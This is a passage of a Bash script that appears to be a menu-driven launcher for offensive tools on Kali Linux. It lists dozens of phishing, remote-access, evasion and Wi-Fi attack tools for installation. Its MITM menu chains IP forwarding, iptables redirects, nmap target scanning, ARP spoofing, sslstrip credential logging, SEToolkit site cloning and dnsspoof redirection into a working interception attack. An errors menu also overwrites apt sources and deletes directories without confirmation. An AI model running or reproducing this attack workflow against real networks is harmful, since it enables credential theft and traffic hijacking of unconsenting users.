904 fi
905 if [[ "${selected["$CLMN2TOOLS"]}" == 1 ]]
906 then
907 COL2="$SEL"
908 fi
909 if [[ "${toolarraysorted["$CLMN2TOOLS"]}" == "" ]]
910 then
911 echo -e ""$YS"${m}"$CE") "$COL1""${toolarraysorted["$n"]}""$CE""
912 else
913 echo -e ""$YS"${m}"$CE") "$COL1""${toolarraysorted["$n"]}""$CE"${SPACES}"$YS""$CLMN2""$CE") "$COL2""${toolarraysorted["$CLMN2TOOLS"]}""$CE""
914 fi
915 n=$((n+1))
916 CLMN2=$((CLMN2+1))
917 CLMN2TOOLS=$((CLMN2TOOLS+1))
918 done
919 echo -e " "$YS"b"$CE") Go back"
920 echo -e " "$YS"s"$CE") Start installing selected tools"
921 echo -e " "$YS"r"$CE") Reset selection"
922 if [[ "$NOCONFIRM" == 1 ]]
923 then
924 echo -e " "$YS"n"$CE") "$YS"No confirmation"$CE""
925 else
926 echo -e " "$YS"n"$CE") No confirmation"
927 fi
928 echo -e " "$YS"0"$CE") Exit"
929 echo -e " Choose: "
930 read ST
931 if [[ "$ST" == "b" || "$ST" == "back" ]]
932 then
933 clear
934 break
935 elif [[ "$ST" == 0 ]]
936 then
937 exit
938 elif [[ "$ST" == 00 ]]
939 then
940 exec bash $0
941 elif [[ "$ST" == "r" ]]
942 then
943 p=0
944 while [[ "$p" -le "$TOOLSNUM" ]]
945 do
946 selected["$p"]=0
947 p=$((p+1))
948 done
949 elif [[ "$ST" == "s" ]]
950 then
951 z=0
952 HOWMANYSELECTED=0
953 while [[ "$z" -lt "$TOOLSNUM" ]]
954 do
955 if [[ ${selected["$z"]} == 1 ]]
956 then
957 HOWMANYSELECTED=$((HOWMANYSELECTED+1))
958 toolselected["$HOWMANYSELECTED"]=${toolarraysorted["$z"]}
959 fi
960 z=$((z+1))
961 done
962 if [[ "$HOWMANYSELECTED" == 0 ]]
963 then
964 echo -e ""$RS"No tools selected"$CE""
965 sleep 2
966 continue
967 fi
968 j=1
969 while [[ "$j" -le "$HOWMANYSELECTED" ]]
970 do
971 clear
972 echo -e ""$YS"Installing "${toolselected["$j"]}""$CE"("$YS"$j"$CE"/"$YS"$HOWMANYSELECTED"$CE")"
973 sleep 1
974 command="install_"${toolselected["$j"]}""
975 $command
976 j=$((j+1))
977 done
978 p=0
979 while [[ "$p" -le "$TOOLSNUM" ]]
980 do
981 selected["$p"]=0
982 p=$((p+1))
983 done
984 NOCONFIRM=0
985 echo -e "$PAKTGB"
986 $READAK
987 elif [[ "$ST" == "n" ]]
988 then
989 if [[ "$NOCONFIRM" != 1 ]]
990 then
991 NOCONFIRM=1
992 else
993 NOCONFIRM=0
994 fi
995 elif [[ ! "$ST" -ge 1 ]]
996 then
997 continue
998 else
999 STF=$((ST-1))
1000 if [[ "${selected["$STF"]}" == 1 ]]
1001 then
1002 selected["$STF"]=0
1003 else
1004 selected["$STF"]=1
1005 fi
1006 fi
1007done
1008#~ while true
1009#~ do
1010 #~ cd
1011 #~ clear
1012 #~ TERMINALTITLE="INSTALL/REINSTALL A TOOL"
1013 #~ dash_calc
1014 #~ printf '\033]2;INSTALL/REINSTALL A TOOL\a'
1015 #~ echo -e ""$BS"Select a tool to install/reinstall"$CE""
1016 #~ echo -e " "$YS"1"$CE") Fluxion "$YS"21"$CE") 4nonimizer "$YS"41"$CE") Infoga "$YS"61"$CE") Wifi-Pumpkin"
1017 #~ echo -e ""$YS" 2"$CE") Wifite "$YS"22"$CE") Openvas "$YS"42"$CE") nWatch "$YS"62"$CE") Veil-Framework"
1018 #~ echo -e ""$YS" 3"$CE") Wifiphisher "$YS"23"$CE") BeeLogger "$YS"43"$CE") Eternal scanner "$YS"63"$CE") Leviathan"
1019 #~ echo -e ""$YS" 4"$CE") Zatacker "$YS"24"$CE") Ezsploit "$YS"44"$CE") Eaphammer "$YS"64"$CE") FakeImageExploiter"
1020 #~ echo -e ""$YS" 5"$CE") Morpheus "$YS"25"$CE") Pupy "$YS"45"$CE") Dagon "$YS"65"$CE") Avet"
1021 #~ echo -e ""$YS" 6"$CE") Osrfconsole "$YS"26"$CE") Zirikatu "$YS"46"$CE") Lalin "$YS"66"$CE") Gloom"
1022 #~ echo -e ""$YS" 7"$CE") Hakku "$YS"27"$CE") WiFi-autopwner"$YS"47"$CE") Knockmail "$YS"67"$CE") Arcanus"
1023 #~ echo -e ""$YS" 8"$CE") Trity "$YS"28"$CE") Bully "$YS"48"$CE") Kwetza "$YS"68"$CE") MSFPC"
1024 #~ echo -e ""$YS" 9"$CE") Cupp "$YS"29"$CE") Anonsurf "$YS"49"$CE") Ngrok "$YS"69"$CE") MorphHTA"
1025 #~ echo -e ""$YS"10"$CE") Dracnmap "$YS"30"$CE") Anonym8 "$YS"50"$CE") Bleachbit "$YS"70"$CE") LFISuite"
1026 #~ echo -e ""$YS"11"$CE") Fern "$YS"31"$CE") TheFatRat "$YS"51"$CE") Vmr mdk "$YS"71"$CE") UniByAv"
1027 #~ echo -e ""$YS"12"$CE") Netdiscover "$YS"32"$CE") Angry IP "$YS"52"$CE") Hash Buster "$YS"72"$CE") Demiguise"
1028 #~ echo -e ""$YS"13"$CE") KickThemOut "$YS"33"$CE") Sniper "$YS"53"$CE") Findsploit "$YS"73"$CE") Dkmc"
1029 #~ echo -e ""$YS"14"$CE") Ghost-Phisher"$YS"34"$CE") ReconDog "$YS"54"$CE") Howdoi "$YS"74"$CE") MITMf"
1030 #~ echo -e ""$YS"15"$CE") The Eye "$YS"35"$CE") RED HAWK "$YS"55"$CE") Operative-frmwork"$YS"75"$CE") Netool-toolkit"
1031 #~ echo -e ""$YS"16"$CE") Xerxes "$YS"36"$CE") WinPayloads "$YS"56"$CE") Netattack2 "$YS"76"$CE") Patator"
1032 #~ echo -e ""$YS"17"$CE") Mdk3-master "$YS"37"$CE") Shellter "$YS"57"$CE") Koadic "$YS"77"$CE") Evil-Droid"
1033 #~ echo -e ""$YS"18"$CE") Katana "$YS"38"$CE") CHAOS "$YS"58"$CE") Empire "$YS"78"$CE") NoSQLMap"
1034 #~ echo -e ""$YS"19"$CE") Airgeddon "$YS"39"$CE") Routersploit "$YS"59"$CE") Meterpr.-Paranoid"
1035 #~ echo -e ""$YS"20"$CE") Websploit "$YS"40"$CE") Geany "$YS"60"$CE") Dr0p1t"
1036 #~ echo -e ""$YS" b"$CE") Go back"
1037 #~ echo -e ""$YS" 0"$CE") Exit"
1038 #~ echo -e "Choose: "
1039 #~ read REIN
1040 #~ clear
1041 #~ if [[ "$REIN" = "1" ]]
1042 #~ then
1043 #~ install_fluxion
1044 #~ elif [[ "$REIN" = "2" ]]
1045 #~ then
1046 #~ install_wifite
1047 #~ elif [[ "$REIN" = "3" ]]
1048 #~ then
1049 #~ install_wifiphisher
1050 #~ elif [[ "$REIN" = "4" ]]
1051 #~ then
1052 #~ install_zatacker
1053 #~ elif [[ "$REIN" = "5" ]]
1054 #~ then
1055 #~ install_morpheus
1056 #~ elif [[ "$REIN" = "6" ]]
1057 #~ then
1058 #~ install_osrframework
1059 #~ elif [[ "$REIN" = "7" ]]
1060 #~ then
1061 #~ install_hakku
1062 #~ elif [[ "$REIN" = "8" ]]
1063 #~ then
1064 #~ install_trity
1065 #~ elif [[ "$REIN" = "9" ]]
1066 #~ then
1067 #~ install_cupp
1068 #~ elif [[ "$REIN" = "10" ]]
1069 #~ then
1070 #~ install_dracnmap
1071 #~ elif [[ "$REIN" = "11" ]]
1072 #~ then
1073 #~ install_fern
1074 #~ elif [[ "$REIN" = "12" ]]
1075 #~ then
1076 #~ install_netdiscover
1077 #~ elif [[ "$REIN" = "13" ]]
1078 #~ then
1079 #~ install_kickthemout
1080 #~ elif [[ "$REIN" = "14" ]]
1081 #~ then
1082 #~ install_ghostphisher
1083 #~ elif [[ "$REIN" = "15" ]]
1084 #~ then
1085 #~ install_theeye
1086 #~ elif [[ "$REIN" = "16" ]]
1087 #~ then
1088 #~ install_xerxes
1089 #~ elif [[ "$REIN" = "17" ]]
1090 #~ then
1091 #~ install_mdk3
1092 #~ elif [[ "$REIN" = "18" ]]
1093 #~ then
1094 #~ install_katana
1095 #~ elif [[ "$REIN" = "19" ]]
1096 #~ then
1097 #~ install_airgeddon
1098 #~ elif [[ "$REIN" = "20" ]]
1099 #~ then
1100 #~ install_websploit
1101 #~ elif [[ "$REIN" = "21" ]]
1102 #~ then
1103 #~ install_4nonimizer
1104 #~ elif [[ "$REIN" = "22" ]]
1105 #~ then
1106 #~ install_openvas
1107 #~ elif [[ "$REIN" = "23" ]]
1108 #~ then
1109 #~ install_beelogger
1110 #~ elif [[ "$REIN" = "24" ]]
1111 #~ then
1112 #~ install_ezsploit
1113 #~ elif [[ "$REIN" = "25" ]]
1114 #~ then
1115 #~ install_pupy
1116 #~ elif [[ "$REIN" = "26" ]]
1117 #~ then
1118 #~ install_zirikatu
1119 #~ elif [[ "$REIN" = "27" ]]
1120 #~ then
1121 #~ install_wifiautopwner
1122 #~ elif [[ "$REIN" = "28" ]]
1123 #~ then
1124 #~ install_bully
1125 #~ elif [[ "$REIN" = "29" ]]
1126 #~ then
1127 #~ install_anonsurf
1128 #~ elif [[ "$REIN" = "30" ]]
1129 #~ then
1130 #~ install_anonym8
1131 #~ elif [[ "$REIN" = "31" ]]
1132 #~ then
1133 #~ install_thefatrat
1134 #~ elif [[ "$REIN" = "32" ]]
1135 #~ then
1136 #~ install_angryip
1137 #~ elif [[ "$REIN" = "33" ]]
1138 #~ then
1139 #~ install_sniper
1140 #~ elif [[ "$REIN" = "34" ]]
1141 #~ then
1142 #~ install_recondog
1143 #~ elif [[ "$REIN" = "35" ]]
1144 #~ then
1145 #~ install_redhawk
1146 #~ elif [[ "$REIN" = "36" ]]
1147 #~ then
1148 #~ install_winpayloads
1149 #~ elif [[ "$REIN" = "37" ]]
1150 #~ then
1151 #~ install_shellter
1152 #~ elif [[ "$REIN" = "38" ]]
1153 #~ then
1154 #~ install_chaos
1155 #~ elif [[ "$REIN" = "39" ]]
1156 #~ then
1157 #~ install_routersploit
1158 #~ elif [[ "$REIN" = "40" ]]
1159 #~ then
1160 #~ install_geany
1161 #~ elif [[ "$REIN" = "41" ]]
1162 #~ then
1163 #~ install_infoga
1164 #~ elif [[ "$REIN" = "42" ]]
1165 #~ then
1166 #~ install_nwatch
1167 #~ elif [[ "$REIN" = "43" ]]
1168 #~ then
1169 #~ install_eternalscanner
1170 #~ elif [[ "$REIN" = "44" ]]
1171 #~ then
1172 #~ install_eaphammer
1173 #~ elif [[ "$REIN" = "45" ]]
1174 #~ then
1175 #~ install_dagon
1176 #~ elif [[ "$REIN" = "46" ]]
1177 #~ then
1178 #~ install_lalin
1179 #~ elif [[ "$REIN" = "47" ]]
1180 #~ then
1181 #~ install_knockmail
1182 #~ elif [[ "$REIN" = "48" ]]
1183 #~ then
1184 #~ install_kwetza
1185 #~ elif [[ "$REIN" = "49" ]]
1186 #~ then
1187 #~ install_ngrok
1188 #~ elif [[ "$REIN" = "50" ]]
1189 #~ then
1190 #~ install_bleachbit
1191 #~ elif [[ "$REIN" = "51" ]]
1192 #~ then
1193 #~ install_vmr
1194 #~ elif [[ "$REIN" = "52" ]]
1195 #~ then
1196 #~ install_hashbuster
1197 #~ elif [[ "$REIN" = "53" ]]
1198 #~ then
1199 #~ install_findsploit
1200 #~ elif [[ "$REIN" = "54" ]]
1201 #~ then
1202 #~ install_howdoi
1203 #~ elif [[ "$REIN" = "55" ]]
1204 #~ then
1205 #~ install_operative
1206 #~ elif [[ "$REIN" = "56" ]]
1207 #~ then
1208 #~ install_netattack2
1209 #~ elif [[ "$REIN" = "57" ]]
1210 #~ then
1211 #~ install_koadic
1212 #~ elif [[ "$REIN" = "58" ]]
1213 #~ then
1214 #~ install_empire
1215 #~ elif [[ "$REIN" = "59" ]]
1216 #~ then
1217 #~ install_meterpreter_paranoid_mode
1218 #~ elif [[ "$REIN" = "60" ]]
1219 #~ then
1220 #~ install_dropit_frmw
1221 #~ elif [[ "$REIN" = "61" ]]
1222 #~ then
1223 #~ install_wifi_pumpkin
1224 #~ elif [[ "$REIN" = "62" ]]
1225 #~ then
1226 #~ install_veil
1227 #~ elif [[ "$REIN" = "63" ]]
1228 #~ then
1229 #~ install_leviathan
1230 #~ elif [[ "$REIN" = "64" ]]
1231 #~ then
1232 #~ install_fake_image
1233 #~ elif [[ "$REIN" = "65" ]]
1234 #~ then
1235 #~ install_avet
1236 #~ elif [[ "$REIN" = "66" ]]
1237 #~ then
1238 #~ install_gloom
1239 #~ elif [[ "$REIN" = "67" ]]
1240 #~ then
1241 #~ install_arcanus
1242 #~ elif [[ "$REIN" = "68" ]]
1243 #~ then
1244 #~ install_msfpc
1245 #~ elif [[ "$REIN" = "69" ]]
1246 #~ then
1247 #~ install_morphhta
1248 #~ elif [[ "$REIN" = "70" ]]
1249 #~ then
1250 #~ install_lfi
1251 #~ elif [[ "$REIN" = "71" ]]
1252 #~ then
1253 #~ install_unibyav
1254 #~ elif [[ "$REIN" = "72" ]]
1255 #~ then
1256 #~ install_demiguise
1257 #~ elif [[ "$REIN" = "73" ]]
1258 #~ then
1259 #~ install_dkmc
1260 #~ elif [[ "$REIN" = "74" ]]
1261 #~ then
1262 #~ install_mitmf
1263 #~ elif [[ "$REIN" = "75" ]]
1264 #~ then
1265 #~ install_netool
1266 #~ elif [[ "$REIN" = "76" ]]
1267 #~ then
1268 #~ install_patator
1269 #~ elif [[ "$REIN" = "77" ]]
1270 #~ then
1271 #~ install_evil_droid
1272 #~ elif [[ "$REIN" = "78" ]]
1273 #~ then
1274 #~ install_nosqlmap
1275 #~ elif [[ "$REIN" = "back" || "$REIN" = "b" ]]
1276 #~ then
1277 #~ clear
1278 #~ break
1279 #~ elif [[ "$REIN" = "00" ]]
1280 #~ then
1281 #~ exec bash "$0"
1282 #~ elif [[ "$REIN" = "0" ]]
1283 #~ then
1284 #~ clear
1285 #~ exit
1286 #~ fi
1287 #~ done
1288}
1289function errors_menu
1290{
1291while true
1292do
1293clear
1294TERMINALTITLE="ERRORS"
1295dash_calc
1296printf '\033]2;ERRORS\a'
1297echo -e ""$YS" 1"$CE") Fix no audio issue"
1298echo -e ""$YS" 2"$CE") No output in wash"
1299echo -e ""$YS" 3"$CE") No full screen"
1300echo -e ""$YS" 4"$CE") Error constructing proxy for org.gnome.Terminal"
1301echo -e ""$YS" 5"$CE") Error starting apache2 service"
1302echo -e ""$YS" 6"$CE") Errors when apt-get update"
1303echo -e ""$YS" 7"$CE") Errors when creating a payload with Winpayloads"
1304echo -e ""$YS" 8"$CE") Complete fix for apache2 service failed to start"
1305echo -e ""$YS" 9"$CE") Cannot capture handshake-pyrit verification always bad"
1306echo -e ""$YS" b"$CE") Go back"
1307echo -e ""$YS" 0"$CE") EXIT"
1308echo -e " Choose: "
1309read ERRS
1310clear
1311if [[ "$ERRS" = "1" ]]
1312then
1313 clear
1314 echo -e "Trying to get you some audio..."
1315 sleep 2
1316 clear
1317 echo -e "Press "$YS"y"$CE" if/when prompted"
1318 sleep 3
1319 clear
1320 echo -e "Installing pulseaudio......."
1321 sleep 1
1322 apt-get pulseaudio
1323 echo -e "Enabling pulseaudio......."
1324 sleep 1
1325 systemctl --user enable pulseaudio && systemctl --user start pulseaudio
1326 clear
1327 echo -e "Done!"
1328 sleep 1
1329 clear
1330 echo -e "I mean...Try to see if you have audio."
1331 sleep 3
1332 echo -e " "
1333 echo -e "That's all i can do :/"
1334 sleep 2
1335 echo -e " "
1336 echo -e "If it wasn't fix , then try rebooting"
1337elif [[ "$ERRS" = "2" ]]
1338then
1339 clear
1340 echo -e "Ok...Lets try to fix this..."
1341 sleep 1
1342 mkdir /etc/reaver
1343 echo -e "It seems to be fixed."
1344 echo -e "Enter you interface"
1345 read INTWASH
1346 echo -e "Press "$YS"many key"$CE" to test wash"
1347 echo -e "Also try "wash -i wlan0mon -a" to display all networks"
1348 wash -i $INTWASH
1349elif [[ "$ERRS" = "3" ]]
1350then
1351 apt-get install -y open-vm-tools-desktop fuse
1352 echo -e "Restart your vistual machine..."
1353 sleep 2
1354 echo -e "$PAKTGB"
1355 $READAK
1356elif [[ "$ERRS" = "4" ]]
1357then
1358 locale-gen
1359 localectl set-locale LANG="en_US.UTF-8"
1360 sleep 2
1361 echo -e "Reboot your system now"
1362 sleep 3
1363elif [[ "$ERRS" = "5" ]]
1364then
1365 service nginx stop
1366 echo -e "I think i fixed it. Try again: service apache2 start "
1367 sleep 5
1368elif [[ "$ERRS" = "6" ]]
1369then
1370 echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" > /etc/apt/sources.list
1371 rm -r -f /etc/apt/sources.list.d/*
1372 echo -e "Try apt-get update again. That's all i can do."
1373 sleep 3
1374elif [[ "$ERRS" = "7" ]]
1375then
1376 rm -f -r /usr/local/lib/python2.7/dist-packages/Crypto
1377 echo -e "Error was fixed!"
1378 echo -e "$PAKTGB"
1379 $READAK
1380elif [[ "$ERRS" = "8" ]]
1381then
1382 apt-get -y remove nginx
1383 apt-get -y remove nginx-full
1384 apt-get -y remove nginx-common
1385 apt-get -y autoremove
1386 clear
1387 echo -e "Error was fixed!"
1388 echo -e "$PAKTGB"
1389 $READAK
1390elif [[ "$ERRS" = "9" ]]
1391then
1392 wget -O /tmp/scapy2.3.2.tar.gz https://pypi.python.org/packages/6d/72/c055abd32bcd4ee6b36ef8e9ceccc2e242dea9b6c58fdcf2e8fd005f7650/scapy-2.3.2.tar.gz; sudo pip2 install /tmp/scapy2.3.2.tar.gz
1393 clear
1394 echo -e "Error was fixed!"
1395 echo -e "$PAKTGB"
1396 $READAK
1397elif [[ "$ERRS" = "back" || "$ERRS" = "b" || "$ERRS" = 00 ]]
1398then
1399 BACKL="1"
1400 break
1401elif [[ "$ERRS" = "0" ]]
1402then
1403 clear
1404 exit
1405else
1406 clear
1407 echo -e "Not a valid option...."
1408 sleep 2
1409fi
1410done
1411}
1412function keyboard_shortcuts
1413{
1414if [[ ! -d ""$KSPATH"" ]]
1415then
1416 mkdir "$KSPATH"
1417fi
1418while true
1419do
1420TERMINALTITLE="KEYBOARD SHORTCUTS"
1421dash_calc
1422printf '\033]2;KEYBOARD SHORTCUTS\a'
1423echo -e ""$YS" 1"$CE") Tools"
1424echo -e ""$YS" 2"$CE") See hidden shortcuts"
1425echo -e ""$YS" b"$CE") Go back"
1426#~ echo -e ""$YS"00"$CE") Main menu"
1427echo -e ""$YS" 0"$CE") EXIT"
1428read KS
1429clear
1430if [[ "$KS" = "1" ]]
1431then
1432 while true
1433 do
1434 echo -e "Available shortcuts: "$YS"reset"$CE") Delete all shortcuts"
1435 nn=1
1436 #start sorting out all the available shortcuts
1437 HOWADD=$(( HOWMANYTOOLS + 1 ))
1438 while [ "$nn" != "$HOWADD" ]
1439 do
1440 listshortcuts
1441 #adding a space where needed on the output,so it will be sorted correctly
1442 if [[ "$nn" -lt "10" ]]
1443 then
1444 n=" $nn"
1445 else
1446 n="$nn"
1447 fi
1448 if [[ ! -f ""$KSPATH"/"$TITLE"/"$TITLE".txt" ]]
1449 then
1450 echo -e ""$YS""$n""$CE") "$TITLE""
1451 else
1452 read KSKS < "$KSPATH"/"$TITLE"/"$TITLE"ks.txt
1453 if [[ "$KSKS" = "" ]]
1454 then
1455 KSKS="ERROR(fix=recreate the shortcut)"
1456 else
1457 read currentks < "$KSPATH"/"$TITLE"/"$TITLE"ks.txt
1458 size=${#TITLE}
1459 calc=$(( 35-size ))
1460 numcalc=1
1461 SPACES=""
1462 while [ $numcalc != $calc ]
1463 do
1464 SPACES=""$SPACES"_"
1465 numcalc=$(( numcalc+1 ))
1466 done
1467 #~ read SPACES < "$KSPATH"/spaces.txt
1468 echo -e ""$YS""$n""$CE") "$TITLE""$SPACES""$KSKS""
1469 fi
1470 fi
1471 nn=$(( nn+1 ))
1472 done
1473 echo -e ""$YS" b"$CE") Go back"
1474 #echo -e ""$YS" 0"$CE") EXIT"
1475 echo -e "Choose: "
1476 #nn=""
1477 read nn
1478 clear
1479 listshortcuts
1480 if [[ "$nn" = "" ]]
1481 then
1482 continue
1483 fi
1484 if [[ "$nn" = "back" || "$nn" = "b" ]]
1485 then
1486 clear
1487 break
1488 elif [[ "$nn" = "0" ]]
1489 then
1490 clear
1491 exit
1492 elif [[ "$nn" = "00" ]]
1493 then
1494 exec bash "$0"
1495 elif [[ "$nn" = "reset" ]]
1496 then
1497 rm -r "$KSPATH"/*
1498 elif [[ "$nn" -le "$HOWMANYTOOLS" ]]
1499 then
1500 createshortcut
1501 fi
1502 done
1503 elif [[ "$KS" = "2" ]]
1504 then
1505 hidden_shortcuts
1506 elif [[ "$KS" = "back" || "$KS" = "b" ]]
1507 then
1508 BACKL="1"
1509 clear
1510 break
1511 elif [[ "$KS" = "0" ]]
1512 then
1513 clear
1514 exit
1515 elif [[ "$KS" = "00" ]]
1516 then
1517 exec bash "$0"
1518 fi
1519done
1520}
1521function mitm_menu
1522{
1523clear
1524TERMINALTITLE="MITM"
1525dash_calc
1526printf '\033]2;MITM\a'
1527echo -e ""$YS" 1"$CE") Password sniff-sslstrip"
1528echo -e ""$YS" 2"$CE") SET + mitm + dnsspoofing"
1529echo -e ""$YS" b"$CE") Go back"
1530echo -e ""$YS" 0"$CE") EXIT"
1531read MITMATT
1532clear
1533if [[ "$MITMATT" = "1" ]]
1534then
1535 while true
1536 do
1537 clear
1538 echo -e "------------------------------"$RS"MITM"$CE"-------------------------------"
1539 echo -e ""$YS" 1"$CE") Enable ip_forward "$YS"d1"$CE") Disable ip_forward "
1540 echo -e ""$YS" 2"$CE") Set iptables"
1541 echo -e ""$YS" 3"$CE") Scan and select target IP "$YS"33"$CE") I have scaned"
1542 echo -e ""$YS" 4"$CE") Open the sslstrip log" # "$YS"44"$CE") Filter credentials"
1543 echo -e ""$YS" b"$CE") Go back"
1544 echo -e ""$YS" 0"$CE") EXIT"
1545 echo -e "Choose: "
1546 read -e MITMCH
1547 if [[ "$MITMCH" = "1" ]]
1548 then
1549 echo "1" > /proc/sys/net/ipv4/ip_forward
1550 echo -e "Done."
1551 sleep 1
1552 elif [[ "$MITMCH" = "d1" ]]
1553 then
1554 echo "0" > /proc/sys/net/ipv4/ip_forward
1555 echo -e "Done."
1556 sleep 1
1557 elif [[ "$MITMCH" = "2" ]]
1558 then
1559 clear
1560 echo -e "Redirect tcp port 80 to port("$YS"Enter"$CE"=8080):"
1561 read PORTTCP
1562 if [[ "$PORTTCP" = "" ]]
1563 then
1564 PORTTCP="8080"
1565 fi
1566 clear
1567 echo -e "Redirect udp port 40 to port("$YS"Enter"$CE"=40):"
1568 read PORTUDP
1569 if [[ "$PORTUDP" = "" ]]
1570 then
1571 PORTUDP="40"
1572 fi
1573 iptables --flush
1574 iptables --flush -t nat
1575 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port $PORTTCP
1576 iptables -t nat -A PREROUTING -p udp --destination-port 40 -j REDIRECT --to-port $PORTUDP
1577 echo -e "Done."
1578 sleep 1
1579 elif [[ "$MITMCH" = "3" ]]
1580 then
1581 clear
1582 route -n
1583 echo -e ""
1584 echo -e ""
1585 echo -e "Enter your gateway(prefer "$ETH" gateway):"
1586 read GATENM
1587 echo -e ""
1588 echo -e "Enter the gateway's interface("$YS"Enter"$CE"="$ETH"):"
1589 read GATEINT
1590 if [[ "$GATEINT" = "" ]]
1591 then
1592 GATEINT="$ETH"
1593 fi
1594 while true
1595 do
1596 clear
1597 nmap -sP "$GATENM"/24
1598 echo -e ""
1599 echo -e ""
1600 echo -e "Enter your target IP:"
1601 read TARGIP
1602 if [[ "$TARGIP" = "r" ]]
1603 then
1604 continue
1605 else
1606 break
1607 fi
1608 done
1609 echo -e ""
1610 echo -e "$PAKTC"
1611 $READAK
1612 export GATENM
1613 export GATEINT
1614 export TARGIP
1615 export PORTTCP
1616 export PORTUDP
1617 cd "$LPATH"/ls
1618 gnome-terminal --geometry 60x12+0+999999 -e ./l131.sh
1619 gnome-terminal --geometry 60x20+999999+999999 -e ./l133.sh
1620 gnome-terminal --geometry 60x20+999999+0 -e ./l132.sh
1621 sslstrip -l $PORTTCP -w /root/sslstrip.log
1622 echo -e "$PAKTGB"
1623 $READAK
1624 continue
1625 elif [[ "$MITMCH" = "33" ]]
1626 then
1627 clear
1628 echo -e "Enter your gateway(prefer "$ETH" gateway):"
1629 read GATENM
1630 echo -e ""
1631 echo -e "Enter the gateway's interface("$YS"Enter"$CE"="$ETH"):"
1632 read GATEINT
1633 if [[ "$GATEINT" = "" ]]
1634 then
1635 GATEINT="$ETH"
1636 fi
1637 clear
1638 echo -e "Enter your target IP("$YS"r"$CE"=rescan):"
1639 read TARGIP
1640 echo -e ""
1641 echo -e "$PAKTC"
1642 $READAK
1643 export GATENM
1644 export GATEINT
1645 export TARGIP
1646 export PORTTCP
1647 export PORTUDP
1648 cd "$LPATH"/ls
1649 gnome-terminal --geometry 60x25+0+999999 -e ./l131.sh
1650 gnome-terminal --geometry 60x25+999999+0 -e ./l132.sh
1651 gnome-terminal --geometry 60x25+999999+999999 -e ./l133.sh
1652 sslstrip -l $PORTTCP -w /root/sslstrip.log
1653 echo -e "$PAKTGB"
1654 $READAK
1655 continue
1656 elif [[ "$MITMCH" = "4" ]]
1657 then
1658 leafpad /root/sslstrip.log
1659 #~ elif [[ "$MITMCH" = "44" ]]
1660 #~ then
1661 elif [[ "$MITMCH" = "back" || "$MITMCH" = "b" ]]
1662 then
1663 clear
1664 break
1665 elif [[ "$MITMCH" = "00" ]]
1666 then
1667 clear
1668 exec bash "$0"
1669 elif [[ "$MITMCH" = "0" ]]
1670 then
1671 clear
1672 exit
1673 fi
1674 done
1675elif [[ "$MITMATT" = "2" ]]
1676then
1677 while true
1678 do
1679 clear
1680 echo -e "------------------------------"$RS"MITM"$CE"-------------------------------"
1681 echo -e ""$YS" 1"$CE") Enable ip_forward "$YS"d1"$CE") Disable ip_forward"
1682 echo -e ""$YS" 2"$CE") Scan and select target IP "$YS"22"$CE") I have scaned"
1683 echo -e ""$YS" 3"$CE") Start ARPspoofing"
1684 #~ echo -e ""$YS" 4"$CE") Start apache2 service "$YS"d4"$CE") Stop apache2 service"
1685 echo -e ""$YS" 4"$CE") Start SEToolkit"
1686 echo -e ""$YS" 5"$CE") Start DNSspoofing"
1687 echo -e ""$YS" b"$CE") Go back"
1688 echo -e ""$YS" 0"$CE") EXIT"
1689 echo -e "Choose: "
1690 read -e MITMSET
1691 clear
1692 if [[ "$MITMSET" = "1" ]]
1693 then
1694 echo "1" > /proc/sys/net/ipv4/ip_forward
1695 echo -e "Done."
1696 sleep 1
1697 elif [[ "$MITMSET" = "d1" ]]
1698 then
1699 echo "0" > /proc/sys/net/ipv4/ip_forward
1700 echo -e "Done."
1701 sleep 1
1702 elif [[ "$MITMSET" = "2" ]]
1703 then
1704 route -n
1705 echo -e ""
1706 echo -e ""
1707 echo -e "Enter your gateway:"
1708 read GATENM
1709 echo -e ""
1710 echo -e "Enter the gateway's interface(e.g: wlan0):"
1711 read GATEINT
1712 while true
1713 do
1714 clear
1715 nmap -sP "$GATENM"/24
1716 echo -e ""
1717 echo -e ""
1718 echo -e "Enter your target IP("$YS"r"$CE"=rescan):"
1719 read TARGIP
1720 if [[ "$TARGIP" = "r" ]]
1721 then
1722 continue
1723 else
1724 break
1725 fi
1726 done
1727 elif [[ "$MITMSET" = "22" ]]
1728 then
1729 echo -e "Enter your gateway:"
1730 read GATENM
1731 echo -e ""
1732 echo -e "Enter the gateway's interface(e.g: wlan0):"
1733 read GATEINT
1734 clear
1735 echo -e "Enter your target IP:"
1736 read TARGIP
1737 elif [[ "$MITMSET" = "3" ]]
1738 then
1739 export PAKTC
1740 export GATEINT
1741 export TARGIP
1742 export GATENM
1743 cd "$LPATH"/ls
1744 gnome-terminal --geometry 60x15+999999+0 -e ./l132.sh
1745 gnome-terminal --geometry 60x15+999999+999999 -e ./l133.sh
1746 #~ elif [[ "$MITMSET" = "4" ]]
1747 #~ then
1748 #~ service apache2 start
1749 #~ elif [[ "$MITMSET" = "d4" ]]
1750 #~ then
1751 #~ service apache2 stop
1752 elif [[ "$MITMSET" = "4" ]]
1753 then
1754 echo -e "Clone a website to one of the following IP(s):"
1755 ip addr | grep '/24' | awk -F "inet " {'print $2'} | cut -d '/' -f1
1756 echo -e "$PAKTC"
1757 $READAK
1758 gnome-terminal --geometry 66x40+999999+0 -e setoolkit
1759 elif [[ "$MITMSET" = "5" ]]
1760 then
1761 echo -e "Making you a hosts.txt file"
1762 echo -e ""
1763 echo -e "Enter your IP address that you started the server:"
1764 echo -e "One of this/these:"
1765 ip addr | grep '/24' | awk -F "inet " {'print $2'} | cut -d '/' -f1
1766 read -e SERVIP
1767 echo -e "Enter the interface of that IP(e.g: wlan0):"
1768 read -e INTIP
1769 if [[ -f ""$LPATH"/HOSTS/hosts.txt" ]]
1770 then
1771 rm "$LPATH"/HOSTS/hosts.txt
1772 fi
1773 mkdir "$LPATH"/HOSTS
1774 clear
1775 while true
1776 do
1777 clear
1778 echo -e "Enter the URL you want to redirect your IP from(e.g: thisis.myfakesite.com):"
1779 read -e URL
1780 echo "$SERVIP $URL" >> "$LPATH"/HOSTS/hosts.txt
1781 sleep 0.2
1782 clear
1783 echo -e "Add another one as well?"$YNYES""
1784 read -e ANOTHERHOST
1785 if [[ "$ANOTHERHOST" = "n" ]]
1786 then
1787 break
1788 fi
1789 done
1790 clear
1791 echo -e "Starting dnsspoof..."
1792 echo -e "$PAKTC"
1793 $READAK
1794 export INTIP
1795 xterm -geometry 60x15+0+999999 -e 'dnsspoof -i $INTIP -f "$LPATH"/HOSTS/hosts.txt'
1796 elif [[ "$MITMSET" = "back" || "$MITMSET" = "b" ]]
